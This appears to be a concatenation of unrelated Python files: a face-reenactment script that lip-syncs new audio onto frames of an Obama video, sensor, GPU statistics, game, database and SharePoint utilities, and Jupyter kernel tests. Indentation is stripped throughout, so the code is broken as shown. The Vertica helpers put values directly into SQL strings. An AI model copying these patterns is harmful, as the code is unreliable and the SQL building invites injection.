from __future__ import division, print_function, absolute_import
from .version import version as __version__
from .core import *
from .clova import *
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from mm.utils.mesh import generateFace
from mm.utils.transform import rotMat2angle
from mm.utils.io import importObj, speechProc
from mm.models import MeshModel
from mm.utils.visualize import animate
import glob, os, json
import numpy as np
from sklearn.neighbors import NearestNeighbors
from sklearn.preprocessing import StandardScaler
import networkx as nx
if __name__ == "__main__":
# Change to relevant data directory
os.chdir('/home/leon/f2f-fitting/data/obama/')
# Specify file name of shiro audio file, number of frames in shiro video, and shiro video FPS
fNameSiro = 'siroNorm.wav'
numFramesSiro = 2882 #3744 #2260
fpsSiro = 24
# Process audio features for the source (shiro) audio file
siroAudioVec, timeVecVideo = speechProc(fNameSiro, numFramesSiro, fpsSiro, return_time_vec = True)
# Create a kNN fitter to find the k closest siro audio features
k = 20
NN = NearestNeighbors(n_neighbors = k, metric = 'l2')
NN.fit(siroAudioVec.T)
"""
Initialize 3DMM, relevant OpenPose landmark indices, etc.
"""
# Load 3DMM
m = MeshModel('../../models/bfm2017.npz')
# Load 3DMM parameters for the shiro video, scaling some for a distance measure
scaler = StandardScaler()
param = np.load('paramRTS2Orig.npy') # Parameters to orthographically project 3DMM onto shiro frame images
expCoef = scaler.fit_transform(param[:, m.numId: m.numId + m.numExp])
angles = param[:, m.numId + m.numExp: m.numId + m.numExp + 3]
trans = scaler.fit_transform(param[:, m.numId + m.numExp + 3: m.numId + m.numExp + 5])
R = np.empty((numFramesSiro, 3, 3))
for i in range(numFramesSiro):
R[i, ...] = rotMat2angle(angles[i, :])
# Load OpenPose 2D landmarks for the siro video
lm = np.empty((numFramesSiro, 70, 2))
for i in range(numFramesSiro):
with open('landmark/' + '{:0>5}'.format(i+1) + '.json', 'r') as fd:
lm[i, ...] = np.array([l[0] for l in json.load(fd)], dtype = int).squeeze()[:, :2]
# These pairs of OpenPose landmark indices correspond to certain features that we want to measure, such as the distance between the lower and upper lips, eyelids, etc.
targetLMPairs = np.array([[42, 47], [43, 46], [44, 45], [30, 36], [42, 45], [44, 47], [25, 29], [26, 28], [19, 23], [20, 22]])
# Get corresponding landmark pairs on the 3DMM
sourceLMPairs = m.sourceLMInd[targetLMPairs]
# Get the unique landmarks in these landmark pairs
uniqueSourceLM, uniqueInv = np.unique(sourceLMPairs, return_inverse = True)
# Load mouth region from 3DMM for animation
mouthIdx = np.load('../../models/bfmMouthIdx.npy')
mouthVertices = np.load('mouthVertices.npy')
mouthFace = importObj('mouth.obj', dataToImport = ['f'])
"""
Loop through the kuro (target) audio files of interest and find the shortest path sequence of shiro video frames to reenact the target audio file
"""
# Loop through each target audio file
for fNameKuro in glob.glob('condition_enhanced/cleaned/*.wav'):
fNameKuro = 'condition_enhanced/cleaned/7_EJF101_ESPBOBAMA1_00101_V01_T01.wav'
kuroAudioVec = speechProc(fNameKuro, numFramesSiro, fpsSiro, kuro = True)
numFramesKuro = kuroAudioVec.shape[1]
distance, ind = NN.kneighbors(kuroAudioVec.T)
# Enforce similarity in similarity transform parameters from candidate frames to original video frames
Dp = np.empty((numFramesKuro, k))
for q in range(numFramesKuro):
c = ind[q, :]
Dp[q, :] = np.linalg.norm(trans[q, :] - trans[c, :], axis = 1) + np.linalg.norm(R[q, ...] - R[c, ...], axis = (1, 2))
# Transition between candidate frames should have similar 3DMM landmarks and expression parameters
mmLm = np.empty((numFramesSiro, 3, uniqueSourceLM.size))
for t in range(numFramesSiro):
mmLm[t] = generateFace(param[t, :], m, ind = uniqueSourceLM)
mmLm = mmLm[..., uniqueInv[::2]] - mmLm[..., uniqueInv[1::2]]
mmLmNorm = np.linalg.norm(mmLm, axis = 1)
Dm = np.empty((numFramesKuro - 1, k, k))
weights = np.empty((numFramesKuro - 1, k, k))
for t in range(numFramesKuro - 1):
for c1 in range(k):
Dm[t, c1] = np.linalg.norm(mmLmNorm[ind[t, c1], :] - mmLmNorm[ind[t+1, :], :], axis = 1) + np.linalg.norm(expCoef[ind[t, c1]] - expCoef[ind[t+1, :], :], axis = 1)
# np.exp(-np.fabs(timeVecVideo[ind[t, c1]] - timeVecVideo[ind[t+1, :]])**2)
weights[t, c1] = Dm[t, c1] + Dp[t, c1] + Dp[t+1, :] + distance[t, c1] + distance[t+1, :]
# Create DAG and assign edge weights from distance matrix
G = nx.DiGraph()
for i in range(numFramesKuro - 1):
left = np.arange(i*k, (i+1)*k)
right = np.arange((i+1)*k, (i+2)*k)
G.add_nodes_from(left)
G.add_nodes_from(right)
G.add_weighted_edges_from((u, v, weights[i, u - i*k, v - (i+1)*k]) for u in left for v in right)
# Use A* shortest path algorithm to find the distances from each of the k source nodes to each of the k terminal nodes
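# No heuristic is supplied to astar_path_length below, so A* reduces to Dijkstra's algorithm here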
astarLength = np.empty((k, k))
for s in range(k):
for t in range(k):
astarLength[s, t] = nx.astar_path_length(G, s, right[t])
# Find the optimal path with the minimum distance of the k^2 paths calculated above
s, t = np.unravel_index(astarLength.argmin(), (k, k))
optPath = nx.astar_path(G, s, right[t])
optPath = np.unravel_index(optPath, (numFramesKuro, k))
optPath = ind[optPath[0], optPath[1]]
# Save the optimal path of shiro video frame indices as an .npy file
# if not os.path.exists('graphOptPath'):
# os.makedirs('graphOptPath')
# np.save('graphOptPath/' + os.path.splitext(os.path.basename(fNameKuro))[0], optPath)
# Animate the reenactment and save
v = mouthVertices.reshape((numFramesSiro, 3, mouthIdx.size), order = 'F')
animate(v[optPath], mouthFace, 'temp/' + os.path.splitext(os.path.basename(fNameKuro))[0], m.texMean[:, mouthIdx])
break
|
import warnings
import pandas as pd
import numpy as np
import time
from autox.autox_server.util import log
from tqdm import tqdm
warnings.filterwarnings('ignore')
from sklearn.feature_extraction.text import CountVectorizer
from pypinyin import pinyin, lazy_pinyin, Style
def str2map(s):
if str(s) == 'None':
return {}
return {si.split(':')[0]: si.split(':')[1] for si in s.split(',')}
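# Example: str2map("a:1,b:2") -> {'a': '1', 'b': '2'}; values stay strings until they are cast later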
def get_keys(kv):
return list(kv.keys())
def fe_kv(G_df_dict, G_data_info, G_hist, is_train, remain_time, AMPERE):
# Derive extra key-value features from the G_df_dict['BIG'] table
start = time.time()
log('[+] feature engineer, kv')
if is_train:
G_hist['FE_kv'] = {}
G_hist['FE_kv']['cols'] = []
G_hist['FE_kv']['col_top_keys'] = {}
cols_kv = [x for x in G_hist['big_cols_kv'] if x in G_df_dict['BIG'].columns]
G_hist['FE_kv']['cols'] = cols_kv
log("kv features: {}".format(G_hist['FE_kv']['cols']))
for col in cols_kv:
temp = G_df_dict['BIG'][[col]].copy()
temp[col] = temp[col].apply(lambda x: str2map(x))
temp[col + '_keys'] = temp[col].apply(lambda x: get_keys(x))
vectorizer = CountVectorizer(max_features=100)
vectorizer.fit_transform(temp[col + '_keys'].astype(str))
G_hist['FE_kv']['col_top_keys'][col] = vectorizer.get_feature_names()
if not AMPERE:
G_df_dict['FE_kv'] = pd.DataFrame()
for col in tqdm(G_hist['FE_kv']['cols']):
for key_ in G_hist['FE_kv']['col_top_keys'][col]:
temp = G_df_dict['BIG'][[col]].copy()
temp[col] = temp[col].apply(lambda x: str2map(x))
try:
G_df_dict['FE_kv'][f"{col}__{key_}__kv"] = temp[col].apply(lambda x: float(x.get(key_, np.nan)))
except:
pass
G_hist['FE_kv']['rename'] = {}
cols_name = []
for i, col in enumerate(G_df_dict['FE_kv'].columns):
col_rename = ''.join(lazy_pinyin(col)) + f'__idx{i}'
cols_name.append(col_rename)
G_hist['FE_kv']['rename'][col_rename] = col
G_df_dict['FE_kv'].columns = cols_name
end = time.time()
remain_time -= (end - start)
log("time consumption: {}".format(str(end - start)))
log("remain_time: {} s".format(remain_time))
return remain_time
|
# MIT License
# Copyright (c) 2017 Philipp Holzer, Karin Aicher
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import smbus
import logging
# SM9541 default address.
SM9541_I2CADDR = 0x28
SM9541_PMIN = -5 # Full Scale Minimum (for SM9541-100C-S-C-3-S)
SM9541_PMAX = 100 # Full Scale Maximum (for SM9541-100C-S-C-3-S)
SM9541_DIGOUTPMIN = 1638 # Pressure Output Minimum
SM9541_DIGOUTPMAX = 14745 # Pressure Output Maximum
class SM9541(object):
def __init__(self):
self._logger = logging.getLogger('SM9541')
self._device = smbus.SMBus(1)
self._sensP = (float)(SM9541_DIGOUTPMAX - SM9541_DIGOUTPMIN) / (
(SM9541_PMAX - SM9541_PMIN))
self._load_calibration()
def _load_calibration(self):
self._device.write_quick(SM9541_I2CADDR)
# Acquire block from sensor
# ToDo: Read only the necessary 4 bytes
def _read_register(self):
# get full 32 byte register of the current block
return self._device.read_i2c_block_data(SM9541_I2CADDR, 0)
# Evaluate field (first 2 bits in first byte)
# 00 ... Normal operation, good data packet
# 01 ... Device in Command Mode (not normal operation)
# 10 ... Stale data: Data that has already been fetched
# 11 ... Diagnostic condition exists
def _read_status(self, values):
return (values[0] & 0xC0) >> 6
def _read_raw_pressure(self, values):
# part 1 (last 6 bits in first byte, shifted away for next bits)
part1 = (values[0] & 0x3F) << 8
# part 2 (8 bits in second byte)
part2 = values[1]
# Concatenate first and second part of the bitstream
return part1 | part2
def _read_raw_temperature(self, values):
# part 1 (shifted away for next bits)
part1 = values[0] << 3
# part 2 (only first three bits)
part2 = (values[1] & 0xE0) >> 5
# Concatenate first and second part of the bitstream
return part1 | part2
def _read_pressure(self, values):
raw_pressure = self._read_raw_pressure(values[:2])
# Pressure from Counts to Scale
return ((float)((raw_pressure - SM9541_DIGOUTPMIN) / self._sensP) +
SM9541_PMIN)
def _read_temperature(self, values):
raw_temperature = self._read_raw_temperature(values[2:4])
# Temperature constant transformation
return ((float)(raw_temperature * 200) / 2048) - 50
def read_all(self):
values = self._read_register()
return [
self._read_status(values),
self._read_pressure(values),
self._read_temperature(values)
]
def read_pressure(self):
values = self._read_register()
return self._read_pressure(values)
def read_temperature(self):
values = self._read_register()
return self._read_temperature(values)
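# Minimal usage sketch (assumes the sensor is wired to I2C bus 1 at the default
# address configured above and that the script runs on the target hardware):
#
#   sensor = SM9541()
#   status, pressure, temperature = sensor.read_all()
#   print(status, pressure, temperature)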
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.patches import Ellipse
def plot_ellipse(position,covariance,ax=None,**kwargs):
if ax is None:
fig, ax = plt.subplots(1,1)
if covariance.shape == (2,2):
U, s, Vt = np.linalg.svd(covariance)
angle = np.degrees(np.arctan2(U[1,0],U[0,0]))
width, height = 2 * np.sqrt(s)
else:
angle = 0
width, height = 2 * np.sqrt(covariance)
# draw ellipse
for nsig in range(1,4):
ax.add_patch(Ellipse(position,nsig*width,nsig*height,angle,**kwargs))
def plot_gmm(gmm,X,label=True,ax=None,dpi=1200,filename=None):
if ax is None:
fig, ax = plt.subplots(1,1)
cluster_id = gmm.fit(X).predict(X)
if isinstance(X,np.ndarray):
x = X[:,0]
y = X[:,1]
elif isinstance(X,pd.DataFrame):
x = X[X.columns[0]]
y = X[X.columns[1]]
if label:
ax.scatter(x,y,c=cluster_id,s=1,cmap='viridis',zorder=2)
else:
ax.scatter(x,y,s=40,zorder=2)
w_factor = 0.2 / gmm.weights_.max()
for pos, covar, w in zip(gmm.means_,gmm.covariances_,gmm.weights_):
plot_ellipse(pos,covar,alpha=w*w_factor,ax=ax,fill=None)
ax.set_xlabel(X.columns[0])
ax.set_ylabel(X.columns[1])
if filename is None:
plt.show()
else:
fig.savefig(filename,dpi=dpi)
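# Minimal usage sketch (assumes scikit-learn is installed; the DataFrame and its
# column names are illustrative):
#
#   from sklearn.mixture import GaussianMixture
#   df = pd.DataFrame(np.random.randn(500, 2), columns=['x', 'y'])
#   plot_gmm(GaussianMixture(n_components=3, covariance_type='full'), df)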
|
from numpy.linalg import cholesky as chol
import numpy as np
from numpy import linalg
from pycuda.gpuarray import GPUArray, to_gpu
from pycuda.gpuarray import empty as gpu_empty
import gpustats.kernels as kernels
from gpustats import codegen
from gpustats.util import transpose as gpu_transpose
reload(codegen)
reload(kernels)
import gpustats.util as util
__all__ = ['mvnpdf_multi']
cu_module = codegen.get_full_cuda_module()
def _multivariate_pdf_call(cu_func, data, packed_params, get, order,
datadim=None):
packed_params = util.prep_ndarray(packed_params)
func_regs = cu_func.num_regs
# Prep the data. Skip if gpu data...
if isinstance(data, GPUArray):
padded_data = data
if datadim is None:
n_data, dim = data.shape
else:
n_data, dim = data.shape[0], datadim
else:
n_data, dim = data.shape
padded_data = util.pad_data(data)
n_params = len(packed_params)
data_per, params_per = util.tune_blocksize(
padded_data,
packed_params,
func_regs
)
shared_mem = util.compute_shared_mem(
padded_data,
packed_params,
data_per,
params_per
)
block_design = (data_per * params_per, 1, 1)
grid_design = (util.get_boxes(n_data, data_per),
util.get_boxes(n_params, params_per))
# see cufiles/mvcaller.cu
design = np.array(
(
(data_per, params_per) + # block design
padded_data.shape + # data spec
(dim,) + # non-padded number of data columns
packed_params.shape # params spec
),
dtype=np.int32
)
if n_params == 1:
gpu_dest = gpu_empty(n_data, dtype=np.float32)
else:
gpu_dest = gpu_empty((n_data, n_params), dtype=np.float32, order='F')
# Upload data if not already uploaded
if not isinstance(padded_data, GPUArray):
gpu_padded_data = to_gpu(padded_data)
else:
gpu_padded_data = padded_data
gpu_packed_params = to_gpu(packed_params)
params = (gpu_dest, gpu_padded_data, gpu_packed_params) + tuple(design)
kwargs = dict(block=block_design, grid=grid_design, shared=shared_mem)
cu_func(*params, **kwargs)
gpu_packed_params.gpudata.free()
if get:
if order == 'F':
return gpu_dest.get()
else:
return np.asarray(gpu_dest.get(), dtype=np.float32, order='C')
else:
if order == 'F' or n_params == 1:
return gpu_dest
else:
res = gpu_transpose(
util.gpu_array_reshape(gpu_dest, (n_params, n_data), "C")
)
gpu_dest.gpudata.free()
return res
def mvnpdf_multi(data, means, covs, weights=None, logged=True,
get=True, order="F", datadim=None):
"""
Multivariate normal density with multiple sets of parameters
Parameters
----------
data : ndarray (n x k)
means : sequence of 1d arrays of length k (length j)
covs : sequence of 2d k x k matrices (length j)
weights : ndarray (length j)
Multiplier for component j, usually will sum to 1
get = False leaves the result on the GPU
without copying back.
If data has already been padded, the original dimension
must be passed in datadim.
If data is of GPUArray type, the data is assumed to be
padded, and datadim will need to be passed if padding
was needed.
Returns
-------
densities : n x j
"""
if logged:
cu_func = cu_module.get_function('log_pdf_mvnormal')
else:
cu_func = cu_module.get_function('pdf_mvnormal')
assert(len(covs) == len(means))
ichol_sigmas = [linalg.inv(chol(c)) for c in covs]
logdets = [-2.0*np.log(c.diagonal()).sum() for c in ichol_sigmas]
if weights is None:
weights = np.ones(len(means))
packed_params = _pack_mvnpdf_params(means, ichol_sigmas, logdets, weights)
return _multivariate_pdf_call(cu_func, data, packed_params,
get, order, datadim)
def _pack_mvnpdf_params(means, ichol_sigmas, logdets, weights):
to_pack = []
for m, ch, ld, w in zip(means, ichol_sigmas, logdets, weights):
to_pack.append(_pack_mvnpdf_params_single(m, ch, ld, w))
return np.vstack(to_pack)
def _pack_mvnpdf_params_single(mean, ichol_sigma, logdet, weight=1):
pad_multiple = 16
k = len(mean)
mean_len = k
ichol_len = k * (k + 1) / 2
mch_len = mean_len + ichol_len
packed_dim = util.next_multiple(mch_len + 2, pad_multiple)
packed_params = np.empty(packed_dim, dtype=np.float32)
packed_params[:mean_len] = mean
packed_params[mean_len:mch_len] = ichol_sigma[np.tril_indices(k)]
packed_params[mch_len:mch_len + 2] = weight, logdet
return packed_params
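# Minimal usage sketch (assumes a CUDA-capable GPU with pycuda set up; the array
# shapes are illustrative):
#
#   data = np.random.randn(1000, 3).astype(np.float32)
#   means = [np.zeros(3), np.ones(3)]
#   covs = [np.eye(3), 2 * np.eye(3)]
#   densities = mvnpdf_multi(data, means, covs)  # (1000, 2) array of log densities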
|
import sys
from PyQt5.QtWidgets import *
class MyWindow(QMainWindow):
def __init__(self):
super().__init__()
self.setGeometry(300, 300, 400, 300)
label1 = QLabel(text="고객 ID", parent=self)  # "Customer ID"
label1.resize(150, 30)
label1.move(10, 10)
label2 = QLabel(text="ID 비밀번호", parent=self)  # "ID password"
label2.resize(150, 30)
label2.move(10, 50)
label3 = QLabel(text="인증비밀번호", parent=self)  # "Authentication (certificate) password"
label3.resize(150, 30)
label3.move(10, 90)
app = QApplication(sys.argv)
win = MyWindow()
win.show()
app.exec_()
|
# Requires vertica-python driver: https://pypi.python.org/pypi/vertica-python/
# which also requires the psycopg2 driver: https://github.com/psycopg/psycopg2
# stdlib imports
import os
try:
# Pitfalls:
# 1 - Returns are in lists, not tuples
# 2 - Parameters are to be tuples, not lists
import vertica_python
except ImportError:
pass
# local imports
from db import Db
from errors import DbError
class VerticaDb(Db):
DEFAULT_PORT=5433
@classmethod
def new(cls, config):
super(VerticaDb, cls).new(config)
if 'revision_schema_name' in cls.config:
cls.history_table_name = cls.config['history_table_name']
cls.full_table_name = '"%s"."%s"' % (cls.config['revision_schema_name'],
cls.config['history_table_name'])
else:
raise DbError('No schema found in config file. Please add one with the key: '
'revision_schema_name')
return cls
@classmethod
def init_conn(cls):
try:
vertica_python
except NameError:
raise DbError('Vertica module not found/loaded. Please make sure all dependencies are installed\n')
cls.conn = cls.conn()
cls.cursor = cls.conn.cursor()
cls.conn_initialized = True
return cls
@classmethod
def execute(cls, query, data=None):
if not cls.conn_initialized:
cls.init_conn()
try:
cursor = cls.cursor
cursor.execute('SET search_path TO %s' % cls.config['schema_name'])
if data:
cursor.execute(query, data)
else:
cursor.execute(query)
results = []
if cursor.rowcount > 0 or cursor.rowcount == -1:
try:
results = cursor.fetchall()
except vertica_python.ProgrammingError, e:
raise vertica_python.ProgrammingError(e.message)
cls.conn.commit()
return results
except Exception, e:
raise DbError('Vertica execution error: %s\n. Query: %s - Data: %s\n.'
% (e.message, query, str(data)))
@classmethod
def drop_revision(cls):
return cls.execute('DROP SCHEMA IF EXISTS %s' % cls.config['revision_schema_name'])
@classmethod
def create_revision(cls):
# Executing 'CREATE SCHEMA IF NOT EXISTS' fails if the user does not
# have schema creation privileges, even if the schema already exists.
# The correct action is to break this method into two parts: checking
# if the schema exists, and then creating it only if it does not.
#
# The 'IF NOT EXISTS' flag is still used in case the database is
# created after the existence check but before the CREATE statement.
check = "SELECT EXISTS(SELECT 1 FROM v_catalog.SCHEMATA WHERE schema_name = '%s')" % cls.config['revision_schema_name']
result = cls.execute(check)
if result[0] == [True]:
return
else:
return cls.execute('CREATE SCHEMA IF NOT EXISTS %s' % cls.config['revision_schema_name'])
@classmethod
def get_commit_history(cls):
return cls.execute('SELECT * FROM %s' % cls.full_table_name)
@classmethod
def append_commit(cls, ref):
return cls.execute('INSERT INTO %s (alter_hash) VALUES (%s)' % (cls.full_table_name, '%s'),
(ref,))
@classmethod
def get_append_commit_query(cls, ref):
return "INSERT INTO %s (alter_hash, ran_on) VALUES ('%s', NOW())" % (cls.full_table_name, ref)
@classmethod
def remove_commit(cls, ref):
return cls.execute('DELETE FROM %s WHERE alter_hash = %s' % (cls.full_table_name, '%s'),
(ref,))
@classmethod
def get_remove_commit_query(cls, ref):
return "DELETE FROM %s WHERE alter_hash = '%s'" % (cls.full_table_name, ref)
@classmethod
def create_history(cls):
return cls.execute("""CREATE TABLE IF NOT EXISTS %s (
id auto_increment NOT NULL,
alter_hash VARCHAR(100) NOT NULL,
ran_on timestamp NOT NULL DEFAULT current_timestamp,
CONSTRAINT pk_%s__id PRIMARY KEY (id),
CONSTRAINT uq_%s__alter_hash UNIQUE (alter_hash) ENABLED
)""" % (cls.full_table_name, cls.history_table_name, cls.history_table_name))
@classmethod
def conn(cls):
"""
return the vertica connection handle to the configured server
"""
config = cls.config
try:
conn_driver_dict = {}
conf_to_driver_map = {'host':'host',
'username':'user',
'password':'password',
'revision_db_name':'database',
'port':'port'}
for conf_key, conf_value in config.iteritems():
try:
driver_key = conf_to_driver_map[conf_key]
driver_value = conf_value
# NOTE: Vertica Python driver requires non-unicode strings
if isinstance(driver_value, unicode):
driver_value = str(driver_value)
conn_driver_dict[driver_key] = driver_value
except KeyError:
pass
conn = vertica_python.connect(**conn_driver_dict)
except Exception, e:
raise DbError("Cannot connect to Vertica Db: %s\n"
"Ensure that the server is running and you can connect normally"
% e.message)
return conn
@classmethod
def run_file_cmd(cls, filename):
"""
return a 3-tuple of strings containing:
the command to run (list)
environment variables to be passed to command (dictionary or None)
data to be piped into stdin (file-like object or None)
"""
port_number = str(cls.config.get('port', VerticaDb.DEFAULT_PORT))
cmd = ['/opt/vertica/bin/vsql',
'-h', cls.config['host'],
'-U', cls.config['username'],
'-p', port_number,
'-v', 'VERBOSITY=verbose',
'-v', 'AUTOCOMMIT=on',
'-v', 'ON_ERROR_STOP=on',
'-v', 'schema=%s' % cls.config['schema_name'],
cls.config['db_name']]
my_env = None
if 'password' in cls.config:
my_env = os.environ.copy()
my_env['VSQL_PASSWORD'] = cls.config['password']
return cmd, my_env, open(filename)
|
import datetime
import functools
def log(func):  # decorator function; its argument is the function to wrap
@functools.wraps(func)  # keep the wrapped function's original name
def wrapper(*args, **kw):  # wrapper contains the decorating code and the call to the original function
print("I am in position.")  # the decorating code, e.g. logging
func(*args, **kw)  # call the original function
return wrapper  # return the decorated function
@log  # apply the decorator
def func():  # the decorated function
print(datetime.datetime.now())
def log1(text):  # decorator that takes its own argument
def decorator(func):  # one extra level of function nesting
@functools.wraps(func)  # keep the wrapped function's original name
def wrapper(*args, **kw):
print('%s %s():'%(text, func.__name__))  # the decorator argument is used inside the wrapper
return func(*args, **kw)
return wrapper
return decorator
@log1("execute")  # the argument is supplied when decorating the function
def func1():
print(datetime.datetime.now())
func()  # the call now also runs the code added by the decorator
print(func.__name__)  # check that functools.wraps preserved the original name
func1()  # call the decorated function
print(func1.__name__)  # check that functools.wraps preserved the original name
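# Expected console output (timestamps will differ):
#   I am in position.
#   <current datetime>
#   func
#   execute func1():
#   <current datetime>
#   func1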
|
import os
import re
from pygame.mixer import Sound
from pygame.sprite import Group
from game.data.enums import InputMode, Screen
from game.data.static import StaticData
class DynamicData():
""" Class which holds all the game variables
"""
def __init__(self):
self.__static= StaticData()
self.__collision_sound = Sound(self.__static.game_sound.get('collision'))
self.__levelup_sound = Sound(self.__static.game_sound.get('levelup'))
self.__shoot_sound = Sound(self.__static.game_sound.get('shoot'))
self.__hit_sound = Sound(self.__static.game_sound.get('hit'))
self.__powerup_sound = Sound(self.__static.game_sound.get('powerup'))
self.__samfire_sound = Sound(self.__static.game_sound.get('samfire'))
self.__game_input = InputMode.KEYBOARD
self.__all_sprites = Group()
self.__bullets = Group()
self.__sam_missiles = Group()
self.__noammo_sprite = None
self.__update_available = False
self.__replay = True
self.__exit = True
self.__update_url = None
self.__player_name = ''
# loading the player name from file, name can be max 20 character long
if os.path.exists(self.__static.player_file):
with open(self.__static.player_file) as file_reader:
name = file_reader.read().strip()[:self.__static.name_length]
self.__player_name = name if name and re.match(r'[a-zA-Z0-9@. ]',name) else ''
self.__active_screen = Screen.NAME_INPUT if not self.__player_name else Screen.GAME_MENU
self.load_defaults()
def load_defaults(self):
self.__ammo = 100
self.__game_level = 1
self.__game_score = 0
self.__game_playtime = 0
self.__bullet_fired = 0
self.__missles_destroyed = 0
self.__sam_missiles.empty()
@property
def collision_sound(self):
return self.__collision_sound
@property
def levelup_sound(self):
return self.__levelup_sound
@property
def shoot_sound(self):
return self.__shoot_sound
@property
def hit_sound(self):
return self.__hit_sound
@property
def powerup_sound(self):
return self.__powerup_sound
@property
def samfire_sound(self):
return self.__samfire_sound
@property
def game_input(self):
return self.__game_input
@game_input.setter
def game_input(self, value):
self.__game_input = value
@property
def all_sprites(self):
return self.__all_sprites
@all_sprites.setter
def all_sprites(self, value):
self.__all_sprites = value
@property
def bullets(self):
return self.__bullets
@bullets.setter
def bullets(self, value):
self.__bullets = value
@property
def sam_missiles(self):
return self.__sam_missiles
@sam_missiles.setter
def sam_missiles(self, value):
self.__sam_missiles = value
@property
def ammo(self):
return self.__ammo
@ammo.setter
def ammo(self, value):
self.__ammo = value if value <= self.__static.max_ammo else self.__static.max_ammo
@property
def noammo_sprite(self):
return self.__noammo_sprite
@noammo_sprite.setter
def noammo_sprite(self, value):
self.__noammo_sprite = value
@property
def game_level(self):
return self.__game_level
@game_level.setter
def game_level(self, value):
self.__game_level = value
@property
def update_available(self):
return self.__update_available
@update_available.setter
def update_available(self, value):
self.__update_available = value
@property
def active_screen(self):
return self.__active_screen
@active_screen.setter
def active_screen(self, value):
self.__active_screen = value
@property
def game_score(self):
return self.__game_score
@game_score.setter
def game_score(self, value):
self.__game_score = value
@property
def game_playtime(self):
return self.__game_playtime
@game_playtime.setter
def game_playtime(self, value):
self.__game_playtime = value
@property
def replay(self):
return self.__replay
@replay.setter
def replay(self, value):
self.__replay = value
@property
def exit(self):
return self.__exit
@exit.setter
def exit(self, value):
self.__exit = value
@property
def player_name(self):
return self.__player_name
@player_name.setter
def player_name(self, value):
self.__player_name = value
# saving the player name to file for future reference
with open(self.__static.player_file, 'w') as file_writer:
file_writer.write(self.__player_name)
@property
def bullets_fired(self):
return self.__bullet_fired
@bullets_fired.setter
def bullets_fired(self, value):
self.__bullet_fired = value
@property
def missiles_destroyed(self):
return self.__missles_destroyed
@missiles_destroyed.setter
def missiles_destroyed(self, value):
self.__missles_destroyed = value
@property
def accuracy(self):
return 0 if self.bullets_fired == 0 else round(self.missiles_destroyed / self.bullets_fired *100, 3)
@property
def update_url(self):
return self.__update_url
@update_url.setter
def update_url(self, value):
self.__update_url = value
|
class TextureNodeCoordinates:
pass
|
import datetime as dt
from src.fetchers.genUnitOutagesFetcher import fetchMajorGenUnitOutages
from src.fetchers.transElOutagesFetcher import fetchTransElOutages
from src.fetchers.longTimeUnrevivedForcedOutagesFetcher import fetchlongTimeUnrevivedForcedOutages
def getWeeklyReportContextObj(appDbConStr: str, startDt: dt.datetime, endDt: dt.datetime) -> dict:
contextObj: dict = {}
contextObj['majorGenOutages'] = fetchMajorGenUnitOutages(
appDbConStr, startDt, endDt)
contextObj['transOutages'] = fetchTransElOutages(
appDbConStr, startDt, endDt)
contextObj['longOutages'] = fetchlongTimeUnrevivedForcedOutages(
appDbConStr, startDt, endDt)
return contextObj
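# Minimal usage sketch (the connection string and date range are illustrative;
# the fetchers expect an application DB reachable via appDbConStr):
#
#   ctx = getWeeklyReportContextObj(appDbConStr, dt.datetime(2021, 3, 1), dt.datetime(2021, 3, 7))
#   sorted(ctx.keys())  # ['longOutages', 'majorGenOutages', 'transOutages']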
|
import re
import jupyter_kernel_test as jkt
class IMatlabTests(jkt.KernelTests):
kernel_name = "imatlab"
language_name = "matlab"
file_extension = ".m"
code_hello_world = "fprintf('hello, world') % some comment"
code_stderr = "fprintf(2, 'oops')"
completion_samples = [
{"text": "matlabroo", "matches": ["matlabroot"]},
# Not including prefix (only `cursor_start:cursor_end`).
{"text": "ls setup.", "matches": ["setup.cfg", "setup.py"]},
]
complete_code_samples = [
"1+1",
"for i=1:3\ni\nend",
# FIXME The following should be considered "invalid", but really all
# that matters is that they are not "incomplete".
"function test_complete",
"function test_complete, end",
"classdef test_complete, end",
]
incomplete_code_samples = [
"for i=1:3",
# FIXME We'd rather consider this as "invalid".
"classdef test_complete",
]
invalid_code_samples = [
"for end",
]
code_display_data = [
{"code": "set(0, 'defaultfigurevisible', 'off'); "
"imatlab_export_fig('print-png'); "
"plot([1, 2]);",
"mime": "image/png"},
]
code_inspect_sample = "help"
# FIXME We actually never send "data" back -- only print it.
# code_generate_error = "[1, 2] + [3, 4, 5];"
# code_execute_result = [
# {"code": "1+1;", "result": ""},
# ]
# FIXME History operations are not tested as (as mentioned in the docs)
# they are unnecessary (re-implemented by the frontends, overly complex).
# supported_history_operations = ["tail", "range", "search"]
# code_history_pattern = [
# re.escape("1+1"),
# ]
# FIXME Not available.
# code_page_something = None
# code_clear_output = None
|
from typing import Any, Dict
import sharepy
from ..config import local_config
from ..exceptions import CredentialError
from .base import Source
class Sharepoint(Source):
"""
A Sharepoint class to connect and download specific Excel file from Sharepoint.
Args:
credentials (dict): In credentials should be included:
"site" - Path to sharepoint website (e.g : {tenant_name}.sharepoint.com)
"username" - Sharepoint username (e.g username@{tenant_name}.com)
"password"
download_from_path (str, optional): Full url to file
(e.g : https://{tenant_name}.sharepoint.com/sites/{directory}/Shared%20Documents/Dashboard/file). Defaults to None.
"""
def __init__(
self,
credentials: Dict[str, Any] = None,
download_from_path: str = None,
*args,
**kwargs,
):
DEFAULT_CREDENTIALS = local_config.get("SHAREPOINT")
credentials = credentials or DEFAULT_CREDENTIALS
if credentials is None:
raise CredentialError("Credentials not found.")
self.url = download_from_path
self.required_credentials = ["site", "username", "password"]
super().__init__(*args, credentials=credentials, **kwargs)
def get_connection(self) -> sharepy.session.SharePointSession:
